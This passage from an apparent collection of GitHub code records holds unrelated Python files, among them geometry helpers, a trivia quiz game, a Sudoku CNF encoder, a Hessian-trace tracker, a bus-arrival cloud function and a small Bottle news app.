line_line_intersect(l1, l2):\n# # l1: Line represented by a 3x3 Plucker matrix.\n# # l2: Line represented by a 3x3 Plucker matrix.\n# # Returns: Point 3-vector.\n \n\ndef plucker_to_line(matrix):\n # Convert 3x3 Plucker matrix to 3-vector.\n vector = np.zeros(3)\n for i,j in itertools.product(range(3), repeat=2):\n for k in range(3):\n vector[k] += levi_civita(i,j,k) * matrix[i, j]\n return vector\n\ndef five_point_conic(p,q,r,s,t):\n x,y,z = sym.symbols(\"x y z\")\n monoms = lambda v: [v[i]*v[j] for i,j in repeat_combinations(range(3), 2)]\n M = sym.Matrix([\n *[monoms([*point, 1]) for point in (p,q,r,s,t)],\n monoms((x,y,z))\n ])\n conic_equation = M.det()\n f = sym.lambdify((x, y), conic_equation.subs(z, 1))\n X,Y = get_grid()\n Z = f(X, Y)\n plt.contour(X, Y, Z, 0)\n plt.scatter(*zip(p,q,r,s,t))\n # for var in [x,y]:\n # fprime = sym.lambdify((x,y), sym.diff(conic_equation, var))\n # plt.contour(X, Y, fprime(X,Y), 0)\n\n # Polarize the quadratic form.\n conic_poly = conic_equation.as_poly()\n conic_polar = sym.zeros(3,3)\n var = (x,y,z)\n \n for i,j in itertools.product(range(3), repeat=2):\n powers = [0,0,0]\n powers[i] += 1\n powers[j] += 1\n conic_polar[i,j] = conic_poly.coeff_monomial(var[i]*var[j])/multinomial(2,powers)\n return conic_equation, conic_polar\n\n\ndef plot_conic(conic_equation):\n x,y,z = sym.symbols(\"x y z\")\n f = sym.lambdify((x, y), conic_equation.subs(z, 1))\n X,Y = get_grid()\n Z = f(X, Y)\n plt.contour(X, Y, Z, 0)\n\n\ndef conic():\n p = np.array([-1,0])\n q = np.array([2,-1])\n r = np.array([3,2])\n s = np.array([2,2.33])\n t = np.array([1,-1])\n conic_equation, conic_polar = five_point_conic(p,q,r,s,t)\n print(conic_equation)\n print(conic_polar)\n # l = point_point_join(np.array([*p,1]), np.array([*q,1]))\n l = point_point_join(np.array([0,0,1]), np.array([1,1,0]))\n R = l.T*conic_polar*l\n\n lamb = sym.symbols(r\"\\lambda\")\n shifted_minor = R + lamb*l\n shifted_minor.col_del(0)\n shifted_minor.row_del(0)\n lamb_sol = sym.solve(shifted_minor.det(), lamb)[0]\n print(lamb_sol)\n shifted_R = R + lamb_sol*l\n intersects = shifted_R.col(0), shifted_R.row(0)\n intersects = [np.array([inter[0]/inter[2], inter[1]/inter[2]]) for inter in intersects]\n plt.scatter(*zip(*intersects), s=100, c=\"r\")\n\n plot_line(plucker_to_line(l))\n a,b,c = sym.symbols(\"a b c\")\n k = sym.Matrix([a,b,c])\n poly = (l*k).T * conic_polar * (l*k)\n poly = (-poly[0]).expand()\n # The result is a degenerate dual conic. This is a product of two lines,\n # whose dual points are the intersection of the original line with the conic.\n print(poly)\n \n\n \n\n\n# def levi_civita_contraction(num_upper, num_lower, tensor):\n# N = tensor.shape[0]\n# assert(upper == N) #-also must be a square tensor.\n# contracted = np.zeros((N,)*num_lower)\n# for contraction_multiindex in itertools.product(range(N), repeat=num_lower):\n# for multiindex in itertools.product(range(N), repeat=num_upper):\n# contracted[*contraction_multiindex] += levi_civita(*contraction_multiindex)\n# levi_civita()\n \n\n\nconic()\nplt.show()\n","repo_name":"LucasPayne/python_math","sub_path":"line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":4897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35237440622","text":"import random\nimport time\nimport os\nmoney = 0\nx = 1\nquestions_asked = []\n\ndef questions(end): # function that calls the questions\n x = 1\n while x % 2 != 0:\n x = random.randint(0,end)\n return x+1\n\ndef answers(end): # function that varifys the answer\n x = 1\n while x % 2 == 0:\n x = random.randint(0,end)\n return x+1\n\nprint(\" $$$$$$\\ $$\\ $$\\ \") # lines 20 too 36 are an opening visual\ntime.sleep(0.4)\nprint(\"$$ __$$\\ \\__| $$ | \")\ntime.sleep(0.4)\nprint(\"$$ / $$ |$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$\\$$$$\\ $$$$$$\\ $$$$$$$\\ $$$$$$\\ $$$$$$\\ $$$$$$\\ \")\ntime.sleep(0.4)\nprint(\"$$ | $$ |$$ | $$ |$$ |\\____$$ |$$ _$$ _$$\\ \\____$$\\ $$ _____|\\_$$ _| $$ __$$\\ $$ __$$\\ \")\ntime.sleep(0.4)\nprint(\"$$ | $$ |$$ | $$ |$$ | $$$$ _/ $$ / $$ / $$ | $$$$$$$ |\\$$$$$$\\ $$ | $$$$$$$$ |$$ | \\__| \")\ntime.sleep(0.4)\nprint(\"$$ $$\\$$ |$$ | $$ |$$ | $$ _/ $$ | $$ | $$ |$$ __$$ | \\____$$\\ $$ |$$\\ $$ ____|$$ | \")\ntime.sleep(0.4)\nprint(\"\\$$$$$$ / \\$$$$$$ |$$ |$$$$$$$$\\ $$ | $$ | $$ |\\$$$$$$$ |$$$$$$$ | \\$$$$ |\\$$$$$$$\\ $$ | \")\ntime.sleep(0.4)\nprint(\" \\___$$$\\ \\______/ \\__|\\________|\\__| \\__| \\__| \\_______|\\_______/ \\____/ \\_______|\\__| \")\ntime.sleep(0.4)\nprint(\" \\___| \")\n\nprint(\"welcome to quizmaster! The game where you can become rich by answering questions!\")\nname = input(\"to start, what is your name?\")\nprint(\"welcome to quizmaster \" + name + \"!\")\nplay = input(\"have you been on quizmaster before?\")\nplay = play.lower()\nwhile x == 1: # while statement is used to ensure the user enters either yes or no\n if play == \"yes\":\n input2 = input(\"would you like to import your saved data?\")\n input2 = input2.lower()\n if input2 == \"yes\":\n os.chdir(\"..\")\n os.chdir(\"Questions\")\n q = open(\"saved_data.txt\", \"r\")\n empty = []\n lines2 = q.readlines() # this puts the reading lines function into a new variable\n tt = len(lines2)\n empty.append(lines2[0].strip()) # this line and 55 accesses the index of the lines and adds them to an empty list\n empty.append(lines2[1].strip())\n empty.append(lines2[2].strip())\n for s in range(3,tt): # this block appends the questions that have been previously asked to the questions_asked list based on how many questions there are\n questions_asked.append(lines2[s].strip())\n y = empty[1] # this sets the iteration variable to the value the user was on when they saved the game\n y = int(y) # this converts the value of 'y' which was a string to a int, same idea is used on line 59\n money = empty[2] #this sets the money variable to what they had in their saved data\n money = int(money)\n print(\"great!, welcome back \" + str(empty[0]))\n print(\"you currently have $\" + str(empty[2]) + \"and are on question \" + str(y))\n elif input2 == \"no\":\n print(\"great! our categories you can choose from today are history of Toronto, Toronto sports, and general Toronto Trivia\")\n print(\"also, if at any time you would like to save your progress, type 'save \")\n y = 1 # if the user has no saved data, the iteration variable is set to 1\n else:\n input2 = input(\"would you like to import your saved data?\") # defensive coding\n x = x + 1 # x = x + 1 ends the while loop\n elif play == \"no\":\n print(\"\"\"great! how quiz master works is there are 3 categories of trivia to choose from and for each question you get right, you win money, and for each you get wrong you lose money\"\"\")\n print(\"today, the categories you can choose from are history of Toronto, Toronto sports, and general Toronto Trivia\")\n print(\"if at anytime you want to save your progress, type 'save' \")\n y = 0\n x = x + 1\n else:\n play = input(\"have you been on quizmaster before?\")\nfor y in range(y,10): # y variable in the range is used to load the saved data\n input1 = input(\"which category would you like to choose from? (history, sports, or general)\")\n input1 = input1.lower()\n\n if input1 == \"save\":\n print(\"your data will be saved\")\n os.chdir(\"..\")\n os.chdir(\"Questions\")\n try: # try except is used so if the file \"saved_data.txt\" exists, no error happens\n g = open(\"saved_data.txt\", \"x\")\n except:\n g = open(\"saved_data.txt\", \"w\") # lines 86 to 89 save the iteration value, money, and questions asked list to the \"saved_data.txt\" file\n g.write('{}'.format(name) + '\\n')\n g.write('{}'.format(y) + '\\n')\n g.write('{}'.format(money) + '\\n')\n g.write('\\n'.join(questions_asked))\n exit()\n\n if input1 == \"history\":\n print(\"great choice, your question is ...\")\n os.chdir(\"..\")\n os.chdir(\"Questions\")\n f = open(\"History.txt\", \"r\")\n f1 = f.readlines()\n lines = f1\n z = questions(len(lines)) # this takes the questions function and picks an index based on the length of the line * note this logic and all other comments for history section apply to the other sections\n question = lines[z]\n while question in questions_asked: # while loop is used so if a question choosen has been picked, a new one will be pick\n z = questions(len(lines))\n question = lines[z]\n answer = lines[z + 1] # answer is on the next line after the question, so this line accesses the answer\n print(question)\n rr = questions_asked.append(question)\n answer_history = input(\"what is your answer?\").strip()\n answer_history = answer_history.lower()\n if answer_history == answer.strip():\n print(\"correct! you will be awarded $100 for completing that question\")\n money = money + 100\n else:\n print(\"im sorry, that is not correct!\")\n print(\"the correct answer is \" + str(answer))\n money = money - 100\n if money < 0: # this is so the users money cant reach negitive values\n money = money + 100\n\n\n elif input1 == \"sports\":\n os.chdir(\"..\")\n os.chdir(\"Questions\")\n c = open(\"Sports.txt\", \"r\")\n f2 = c.readlines()\n lines = f2\n ty = questions(len(lines))\n question = lines[ty]\n while question in questions_asked:\n ty = questions(len(lines))\n question = lines[ty]\n answer = lines[ty + 1]\n print(question)\n rr = questions_asked.append(question)\n answer_sports = input(\"what is your answer?\").strip()\n answer_sports = answer_sports.lower()\n if answer_sports == answer.strip():\n print(\"correct! you will be awarded $100 for completing that question\")\n money = money + 100\n else:\n print(\"im sorry, that is not correct!\")\n print(\"the correct answer is \" + str(answer))\n money = money - 100\n if money < 0:\n money = money + 100\n\n elif input1 == \"general\":\n print(\"excellent choice, your question is...\")\n os.chdir(\"..\")\n os.chdir(\"Questions\")\n e = open(\"General.txt\", \"r\")\n f3 = e.readlines()\n lines = f3\n ff = questions(len(lines))\n question = lines[ff]\n while question in questions_asked:\n ff = questions(len(lines))\n question = lines[ff]\n answer = lines[ff + 1]\n print(question)\n rr = questions_asked.append(question)\n answer_sports = input(\"what is your answer?\").strip()\n answer_sports = answer_sports.lower()\n if answer_sports == answer.strip():\n print(\"correct! you will be awarded $100 for completing that question\")\n money = money + 100\n else:\n print(\"im sorry, that is not correct!\")\n print(\"the correct answer is \" + str(answer))\n money = money - 100\n if money < 0:\n money = money + 100\n\n else:\n print(\"sorry! \" + input1 + \" isnt a category!\")\n\n\nif money == 0:\n print(\"im sorry! you did not win any money\")\nif money >= 100 and money <= 399:\n print(\"congratuations! you did ok! you won $\" + str(money) + \"!\")\nif money >= 400 and money <= 699:\n print(\"congratuations! you did well! you won $\" + str(money) + \"!\")\nif money >= 700 and money <= 999:\n print(\"Congratuations! you did great! you won $\" + str(money) + \"!\")\nif money == 1000:\n print(\"Congratulations! you did amazing you got every question right and won yourself $\" +str(money) + \"!\")","repo_name":"notandrewsimpson/Quzmaster","sub_path":"Quizmaster.py","file_name":"Quizmaster.py","file_ext":"py","file_size_in_byte":8776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32426807569","text":"from ete3 import Tree\nimport sys\nfrom tqdm import tqdm\n\nfn = sys.argv[1]\nprint('Processing', fn)\nprefix = fn[:fn.rfind('.')]\nt = Tree(fn)\nprint('Tree length before:', len(t))\nt.resolve_polytomy(default_dist=1E-10)\nfor n in tqdm(t, total=len(t)):\n n.dist = n.dist + 1E-10\nwith open('%s.hmmufotu.tree' % prefix, 'w') as out:\n out.write(t.write())\nprint('Tree length after:', len(t))\n","repo_name":"jshleap/TA_pipes","sub_path":"format_tree4hmmufotu.py","file_name":"format_tree4hmmufotu.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"42087291652","text":"n, m = map(int, input().split())\narray = [list(input()) for _ in range(n)]\n\ncount = 0\nwhile True:\n result = sum(array[i].count('0') for i in range(n))\n if result == n * m:\n break\n for i in range(n):\n for j in range(m):\n if array[i][j] == '1':\n x, y = i, j\n\n for i in range(x+1):\n for j in range(y+1):\n if array[i][j] == '0':\n array[i][j] = '1'\n else:\n array[i][j] = '0'\n\n count += 1\n\nprint(count)\n\n\n","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/solution626.py","file_name":"solution626.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2048460099","text":"import fileinput\n\ndef s(row, column, value):\n return 81 * (row - 1) + 9 * (column - 1) + value\n\ndisjunctions = \"\"\n\n# there is at least one number in each entry\nfor x in range(1, 10):\n for y in range(1, 10):\n for z in range(1, 10):\n disjunctions += '{0:d} '.format(s(x, y, z))\n disjunctions += \"0\\n\"\n\n# each number appears at most once in each row\nfor y in range(1, 10):\n for z in range(1, 10):\n for x in range(1, 9):\n for i in range(x + 1, 10):\n disjunctions += '-{0:d} -{1:d} 0\\n'.format(s(x, y, z), s(i, y, z))\n\n# each number appears at most once in each column\nfor x in range(1, 10):\n for z in range(1, 10):\n for y in range(1, 9):\n for i in range(y + 1, 10):\n disjunctions += '-{0:d} -{1:d} 0\\n'.format(s(x, y, z), s(x, i, z))\n\n# each number appears at most once in each 3x3 sub-grid\nfor z in range(1, 10):\n for i in range(0, 3):\n for j in range(0, 3):\n for x in range(1, 4):\n for y in range(1, 4):\n for k in range(y + 1, 4):\n disjunctions += '-{0:d} -{1:d} 0\\n'.format(s(3 * i + x, 3 * j + y, z),\n s(3 * i + x, 3 * j + k, z))\n for k in range(x + 1, 4):\n for l in range(1, 4):\n disjunctions += '-{0:d} -{1:d} 0\\n'.format(s(3 * i + x, 3 * j + y, z),\n s(3 * i + k, 3 * j + l, z))\n\nnumdis = 8829 # minimal encoding will have 8829 disjunctions\n\nfin = fileinput.input('sudokuinput.txt')\nrows = 0\nfor row in fin:\n rows += 1\n col = row.split()\n cols = 0\n for val in col:\n cols += 1\n if val != 'x':\n disjunctions += '{:d} 0\\n'.format(s(rows, cols, int(val))) # the given value must be true\n numdis += 1 # add one to the number of disjunctions\n\n\n\nline1 = 'p cnf 729 {0:d}\\n'.format(numdis) # first line is 'p cnf numvars(729) numdis'\nfile = open('sudoku.txt', 'w')\nfile.write(line1 + disjunctions)\nfile.close()\n","repo_name":"seankrummel/LutherCollegeCoursework","sub_path":"CS-260/sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72735568428","text":"\"\"\"Class for tracking the Trace of the Hessian or an approximation thereof.\"\"\"\n\nfrom backpack import extensions\n\nfrom cockpit.quantities.quantity import SingleStepQuantity\n\n\nclass HessTrace(SingleStepQuantity):\n \"\"\"Quantitiy Class tracking the trace of the Hessian during training.\"\"\"\n\n extensions_from_str = {\n \"diag_h\": extensions.DiagHessian,\n \"diag_ggn_exact\": extensions.DiagGGNExact,\n \"diag_ggn_mc\": extensions.DiagGGNMC,\n }\n\n def __init__(self, track_schedule, verbose=False, curvature=\"diag_h\"):\n \"\"\"Initialization sets the tracking schedule & creates the output dict.\n\n Note:\n The curvature options ``\"diag_h\"`` and ``\"diag_ggn_exact\"`` are more\n expensive than ``\"diag_ggn_mc\"``, but more precise. For a classification\n task with ``C`` classes, the former require that ``C`` times more\n information be backpropagated through the computation graph.\n\n Args:\n track_schedule (callable): Function that maps the ``global_step``\n to a boolean, which determines if the quantity should be computed.\n verbose (bool, optional): Turns on verbose mode. Defaults to ``False``.\n curvature (string): Which diagonal curvature approximation should be used.\n Options are ``\"diag_h\"``, ``\"diag_ggn_exact\"``, ``\"diag_ggn_mc\"``.\n \"\"\"\n super().__init__(track_schedule, verbose=verbose)\n\n self._curvature = curvature\n\n def extensions(self, global_step):\n \"\"\"Return list of BackPACK extensions required for the computation.\n\n Args:\n global_step (int): The current iteration number.\n\n Raises:\n KeyError: If curvature string has unknown associated extension.\n\n Returns:\n list: (Potentially empty) list with required BackPACK quantities.\n \"\"\"\n ext = []\n\n if self.should_compute(global_step):\n try:\n ext.append(self.extensions_from_str[self._curvature]())\n except KeyError as e:\n available = list(self.extensions_from_str.keys())\n raise KeyError(f\"Available: {available}\") from e\n\n return ext\n\n def _compute(self, global_step, params, batch_loss):\n \"\"\"Evaluate the trace of the Hessian at the current point.\n\n Args:\n global_step (int): The current iteration number.\n params ([torch.Tensor]): List of torch.Tensors holding the network's\n parameters.\n batch_loss (torch.Tensor): Mini-batch loss from current step.\n\n Returns:\n list: Trace of the Hessian at the current point.\n \"\"\"\n return [\n diag_c.sum().item()\n for diag_c in self._fetch_diag_curvature(\n params, self._curvature, aggregate=False\n )\n ]\n","repo_name":"f-dangel/cockpit","sub_path":"cockpit/quantities/hess_trace.py","file_name":"hess_trace.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":453,"dataset":"github-code","pt":"37"} +{"seq_id":"44215880521","text":"from __future__ import annotations\n\nfrom typing import Any\n\nfrom docutils import nodes\nfrom docutils.nodes import Node\nfrom sphinx.application import Sphinx\nfrom sphinx.environment.adapters.toctree import TocTree\nfrom sphinx.util.docutils import new_document\n\n\ndef change_toc(\n app: Sphinx,\n pagename: str,\n templatename: str,\n context: dict[str, Any],\n doctree: Node,\n) -> None:\n \"\"\"Change the way the `{{ toc }}` helper works.\n\n By default, Sphinx includes the page title in the on-page TOC.\n We don't want that.\n\n Sphinx returns the following structure:\n\n \n\n We first remove the `title` node. This gives us:\n\n \n\n Then, we _outdent_ the tree.\n \"\"\"\n toc = TocTree(app.builder.env).get_toc_for(pagename, app.builder)\n\n # Remove `h1` node\n findall = \"findall\" if hasattr(toc, \"findall\") else \"traverse\"\n # `findall` is docutils > 0.18\n for node in getattr(toc, findall)(nodes.reference):\n if node[\"refuri\"] == \"#\":\n # Remove the `list_item` wrapping the `reference` node.\n node.parent.parent.remove(node.parent)\n\n # Outdent the new empty outer bullet lists\n doc = new_document(\"\")\n doc.append(toc)\n\n # Replace outer bullet lists with inner bullet lists\n for node in doc.findall(nodes.bullet_list):\n if (\n len(node.children) == 1\n and isinstance(node.next_node(), nodes.list_item)\n and isinstance(node.next_node().next_node(), nodes.bullet_list)\n ):\n doc.replace(node, node.next_node().next_node())\n\n if hasattr(app.builder, \"_publisher\"):\n app.builder._publisher.set_source(doc)\n app.builder._publisher.publish()\n context[\"toc\"] = app.builder._publisher.writer.parts[\"fragment\"]\n","repo_name":"jchanvfx/NodeGraphQt","sub_path":"docs/_themes/sphinxawesome_theme/toc.py","file_name":"toc.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":1061,"dataset":"github-code","pt":"37"} +{"seq_id":"28072160250","text":"pessoas = []\ndados = [] #temporario\n\nwhile True:\n dados.append(str(input('Digite o nome da pessoa: ')))\n dados.append(float(input('Digite o peso da pessoa: ')))\n pessoas.append(dados[:])\n if len(pessoas) == 1:\n maior_peso = menor_peso = dados[1]\n else:\n if dados[1] > maior_peso:\n maior_peso = dados[1]\n elif dados[1] < menor_peso:\n menor_peso = dados[1]\n dados.clear()\n while True:\n op = str(input('Você deseja continuar? [S/N] ')).upper().strip()\n if op in 'SN':\n break\n print('Opção inválida!', end=' ')\n if op == 'N':\n break\nprint('-'*30)\nprint(f'Foram cadastradas {len(pessoas)} pessoas')\nprint(f'O maior peso foi de {maior_peso}Kg. Peso de:', end=' ')\nfor p in pessoas:\n if p[1] == maior_peso:\n print(f'[{p[0]}]', end=' ')\nprint()\nprint(f'O menor peso foi de {menor_peso}Kg. Peso de:', end=' ')\nfor p in pessoas:\n if p[1] == menor_peso:\n print(f'[{p[0]}]', end=' ')\nprint()\n","repo_name":"malucaires/cursoemvideo_python","sub_path":"mundo_3/ex084.py","file_name":"ex084.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15800966738","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\nfrom kiota_abstractions.serialization import AdditionalDataHolder, Parsable, ParseNode, SerializationWriter\nfrom kiota_abstractions.store import BackedModel, BackingStore, BackingStoreFactorySingleton\nfrom typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union\n\n@dataclass\nclass WorkbookWorksheetProtectionOptions(AdditionalDataHolder, BackedModel, Parsable):\n # Stores model information.\n backing_store: BackingStore = field(default_factory=BackingStoreFactorySingleton(backing_store_factory=None).backing_store_factory.create_backing_store, repr=False)\n\n # Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.\n additional_data: Dict[str, Any] = field(default_factory=dict)\n # Represents the worksheet protection option of allowing using auto filter feature.\n allow_auto_filter: Optional[bool] = None\n # Represents the worksheet protection option of allowing deleting columns.\n allow_delete_columns: Optional[bool] = None\n # Represents the worksheet protection option of allowing deleting rows.\n allow_delete_rows: Optional[bool] = None\n # Represents the worksheet protection option of allowing formatting cells.\n allow_format_cells: Optional[bool] = None\n # Represents the worksheet protection option of allowing formatting columns.\n allow_format_columns: Optional[bool] = None\n # Represents the worksheet protection option of allowing formatting rows.\n allow_format_rows: Optional[bool] = None\n # Represents the worksheet protection option of allowing inserting columns.\n allow_insert_columns: Optional[bool] = None\n # Represents the worksheet protection option of allowing inserting hyperlinks.\n allow_insert_hyperlinks: Optional[bool] = None\n # Represents the worksheet protection option of allowing inserting rows.\n allow_insert_rows: Optional[bool] = None\n # Represents the worksheet protection option of allowing using pivot table feature.\n allow_pivot_tables: Optional[bool] = None\n # Represents the worksheet protection option of allowing using sort feature.\n allow_sort: Optional[bool] = None\n # The OdataType property\n odata_type: Optional[str] = None\n \n @staticmethod\n def create_from_discriminator_value(parse_node: Optional[ParseNode] = None) -> WorkbookWorksheetProtectionOptions:\n \"\"\"\n Creates a new instance of the appropriate class based on discriminator value\n param parse_node: The parse node to use to read the discriminator value and create the object\n Returns: WorkbookWorksheetProtectionOptions\n \"\"\"\n if not parse_node:\n raise TypeError(\"parse_node cannot be null.\")\n return WorkbookWorksheetProtectionOptions()\n \n def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"\n The deserialization information for the current model\n Returns: Dict[str, Callable[[ParseNode], None]]\n \"\"\"\n fields: Dict[str, Callable[[Any], None]] = {\n \"allowAutoFilter\": lambda n : setattr(self, 'allow_auto_filter', n.get_bool_value()),\n \"allowDeleteColumns\": lambda n : setattr(self, 'allow_delete_columns', n.get_bool_value()),\n \"allowDeleteRows\": lambda n : setattr(self, 'allow_delete_rows', n.get_bool_value()),\n \"allowFormatCells\": lambda n : setattr(self, 'allow_format_cells', n.get_bool_value()),\n \"allowFormatColumns\": lambda n : setattr(self, 'allow_format_columns', n.get_bool_value()),\n \"allowFormatRows\": lambda n : setattr(self, 'allow_format_rows', n.get_bool_value()),\n \"allowInsertColumns\": lambda n : setattr(self, 'allow_insert_columns', n.get_bool_value()),\n \"allowInsertHyperlinks\": lambda n : setattr(self, 'allow_insert_hyperlinks', n.get_bool_value()),\n \"allowInsertRows\": lambda n : setattr(self, 'allow_insert_rows', n.get_bool_value()),\n \"allowPivotTables\": lambda n : setattr(self, 'allow_pivot_tables', n.get_bool_value()),\n \"allowSort\": lambda n : setattr(self, 'allow_sort', n.get_bool_value()),\n \"@odata.type\": lambda n : setattr(self, 'odata_type', n.get_str_value()),\n }\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n writer.write_bool_value(\"allowAutoFilter\", self.allow_auto_filter)\n writer.write_bool_value(\"allowDeleteColumns\", self.allow_delete_columns)\n writer.write_bool_value(\"allowDeleteRows\", self.allow_delete_rows)\n writer.write_bool_value(\"allowFormatCells\", self.allow_format_cells)\n writer.write_bool_value(\"allowFormatColumns\", self.allow_format_columns)\n writer.write_bool_value(\"allowFormatRows\", self.allow_format_rows)\n writer.write_bool_value(\"allowInsertColumns\", self.allow_insert_columns)\n writer.write_bool_value(\"allowInsertHyperlinks\", self.allow_insert_hyperlinks)\n writer.write_bool_value(\"allowInsertRows\", self.allow_insert_rows)\n writer.write_bool_value(\"allowPivotTables\", self.allow_pivot_tables)\n writer.write_bool_value(\"allowSort\", self.allow_sort)\n writer.write_str_value(\"@odata.type\", self.odata_type)\n writer.write_additional_data_value(self.additional_data)\n \n\n","repo_name":"microsoftgraph/msgraph-sdk-python","sub_path":"msgraph/generated/models/workbook_worksheet_protection_options.py","file_name":"workbook_worksheet_protection_options.py","file_ext":"py","file_size_in_byte":5651,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"37"} +{"seq_id":"8205458622","text":"\"\"\"Example of csv\"\"\"\nimport csv\nimport datetime\nimport typing\n\n\ndef write_to_csv(csv_path: str) -> None:\n \"\"\"Write to csv.\"\"\"\n with open(csv_path, 'w') as file_writer:\n header = [\n 'timestamp',\n 'code',\n 'message',\n 'val1',\n 'val2',\n 'val3'\n ]\n csv_writer = csv.writer(file_writer)\n csv_writer.writerow(header)\n dt_0 = datetime.datetime(2021, 11, 10, 11, 12, 13)\n dt_1 = datetime.datetime(2021, 11, 11, 23, 59, 59)\n\n row = [dt_0, 10, 'Hello', *[1, 2, 3]]\n csv_writer.writerow(row)\n row = [dt_1, 11, 'こんにちは', *[4, 5, 6]]\n csv_writer.writerow(row)\n\n\ndef read_from_csv(csv_path: str) -> None:\n \"\"\"Read from csv.\"\"\"\n with open(csv_path, 'r') as file_reader:\n reader = csv.reader(file_reader)\n row: typing.List[str]\n for row in reader:\n print(\",\".join(row))\n\n\ndef main() -> None:\n \"\"\"Run main.\"\"\"\n write_to_csv('sample.csv')\n read_from_csv('sample.csv')\n\n\nif __name__ == '__main__':\n main()\n\n# EOF\n","repo_name":"unmyr/python-examples","sub_path":"src/csv/csv_with_header_py3.py","file_name":"csv_with_header_py3.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36478033650","text":"import json\nfrom time import timezone\nfrom requests import request as req\nfrom datetime import datetime, timedelta, timezone\nimport os\nimport functions_framework\nfrom flask import escape\n\n\n\nBUS_ARRIVAL_URL = \"http://datamall2.mytransport.sg/ltaodataservice/BusArrivalv2\"\nACCOUNT_KEY = os.environ[\"ACCOUNT_KEY\"]\n\n@functions_framework.http\ndef processReq(request):\n\n request_json = request.get_json(silent=True)\n request_args = request.args\n\n if not request_args or not 'busStopCode' in request_args or not 'serviceNo' in request_args:\n return 'Invalid Request'\n return getArrivalTimings(request_args['busStopCode'], request_args['serviceNo'])\n\n\ndef getArrivalTimings(busStopCode: str, serviceNo: str) -> list:\n headers = {\n 'AccountKey': ACCOUNT_KEY,\n 'Accept': 'application/json'\n }\n try:\n response = req(\"GET\", f'{BUS_ARRIVAL_URL}?BusStopCode={busStopCode}', headers=headers)\n response = response.json()\n # Set CORS headers for the main request\n headers = {\n 'Access-Control-Allow-Origin': '*'\n }\n service = list(filter(lambda x: x['ServiceNo'] == str(serviceNo), response['Services']))\n if not service:\n emptyRes = {\n 'nextBus': '-',\n 'nextBus2': '-',\n 'nextBus3': '-'\n }\n return (emptyRes, 404, headers)\n currentTime = datetime.now(timezone(timedelta(hours=8)))\n currentTime = currentTime.replace(tzinfo=None)\n nextBus = datetime.strptime(service[0]['NextBus']['EstimatedArrival'], '%Y-%m-%dT%H:%M:%S+08:00') - currentTime\n if len(service[0]['NextBus2']['EstimatedArrival']) > 1:\n nextBus2 = datetime.strptime(service[0]['NextBus2']['EstimatedArrival'], '%Y-%m-%dT%H:%M:%S+08:00') - currentTime\n nextBus2 = min(nextBus2.seconds//60,60)\n else:\n nextBus2 = '-'\n if len(service[0]['NextBus3']['EstimatedArrival']) > 1:\n nextBus3 = datetime.strptime(service[0]['NextBus3']['EstimatedArrival'], '%Y-%m-%dT%H:%M:%S+08:00') - currentTime\n nextBus3 = min(nextBus3.seconds//60,60)\n else:\n nextBus3 = '-'\n res = {\n 'nextBus': min(nextBus.seconds//60,60),\n 'nextBus2': nextBus2,\n 'nextBus3': nextBus3\n }\n return (res,200,headers)\n except Exception as e:\n print(e)\n headers = {\n 'Access-Control-Allow-Origin': '*'\n }\n return (e,500,headers)\n ","repo_name":"schoolex/cs3219-otot-B","sub_path":"busArrivalGcf.py","file_name":"busArrivalGcf.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28768926901","text":"import bottle\nimport pymongo\nimport newsDAO\nfrom bottle import static_file\n\n@bottle.route('/')\ndef news_index():\n news_list = news.find_news()\n return bottle.template('index', dict(news = news_list))\n\n@bottle.route('/comment', method='POST')\ndef insert_commet():\n comment = bottle.request.forms.get(\"comment\")\n id = bottle.request.forms.get(\"id\")\n news.insert_comment(comment, id)\n return bottle.redirect('/')\n\n\n@bottle.route('/static/:path#.+#', name='static')\ndef static(path):\n return static_file(path, root='static')\n\nconnection_string = \"mongodb://localhost\"\nconnection = pymongo.MongoClient(connection_string)\n\ndatabase = connection.web\n\nnews = newsDAO.NewsDAO(database)\n\nbottle.debug(True)\nbottle.run(host = 'localhost', port = 8082)","repo_name":"Rep2/NMBP_2.proj","sub_path":"1 zad/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19160413679","text":"import cv2\nfrom streamlit_webrtc import webrtc_streamer, RTCConfiguration, WebRtcMode\nimport mediapipe as mp\nimport av\n\nRTC_CONFIGURATION = RTCConfiguration(\n {\"iceServers\": [{\"urls\": [\"stun:stun.l.google.com:19302\"]}]}\n)\n\nmpDraw = mp.solutions.drawing_utils\nhand_mesh = mp.solutions.hands.Hands(\n static_image_mode=False,\n max_num_hands=1,\n min_detection_confidence=0.8,\n 